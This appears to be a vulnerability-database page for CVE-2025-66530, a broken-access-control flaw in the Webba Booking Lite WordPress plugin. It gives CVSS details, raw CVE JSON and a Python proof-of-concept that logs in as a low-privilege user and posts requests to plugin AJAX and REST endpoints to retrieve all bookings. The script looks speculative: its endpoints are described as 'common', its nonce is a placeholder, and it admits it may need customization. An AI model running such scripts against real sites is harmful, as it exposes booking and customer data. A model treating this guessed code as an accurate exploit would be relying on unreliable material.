Security Vulnerability Report
中文
CVE-2025-66530 CVSS 4.3 MEDIUM

CVE-2025-66530

Published: 2025-12-09 16:18:20
Last Modified: 2026-04-27 18:16:38

Description

Missing Authorization vulnerability in Webba Appointment Booking Webba Booking webba-booking-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Webba Booking: from n/a through <= 6.2.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Webba Booking Lite <= 6.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-66530 PoC - Broken Access Control in Webba Booking Lite # Target: WordPress site with Webba Booking Lite plugin <= 6.2.1 def exploit_cve_2025_66530(target_url, wp_user, wp_password): """ Exploit Missing Authorization vulnerability in Webba Booking Lite Allows low-privilege users to access/administer booking functionality """ session = requests.Session() # Step 1: Login to WordPress with low-privilege account login_url = f"{target_url}/wp-login.php" login_data = { 'log': wp_user, 'pwd': wp_password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } resp = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful with low-privilege account") # Step 2: Exploit Broken Access Control - Access admin functions # Common Webba Booking Lite AJAX endpoints ajax_endpoints = [ f"{target_url}/wp-admin/admin-ajax.php", f"{target_url}/wp-json/wbba/v1/" ] # Step 3: Try to access/modify booking data without proper authorization exploit_data = { 'action': 'webba_booking_ajax_action', 'webba_nonce': 'exploit', 'sub_action': 'get_all_bookings' } for endpoint in ajax_endpoints: try: resp = session.post(endpoint, data=exploit_data, timeout=10) if resp.status_code == 200 and 'booking' in resp.text.lower(): print(f"[+] Exploit successful at {endpoint}") print(f"[+] Response: {resp.text[:500]}") return True except: continue print("[-] Exploit may require further customization") return False if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2025-66530.py <target_url> <username> <password>") sys.exit(1) exploit_cve_2025_66530(sys.argv[1], sys.argv[2], sys.argv[3])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66530", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:20.307", "lastModified": "2026-04-27T18:16:38.477", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Webba Appointment Booking Webba Booking webba-booking-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Webba Booking: from n/a through <= 6.2.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/webba-booking-lite/vulnerability/wordpress-webba-booking-plugin-6-2-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}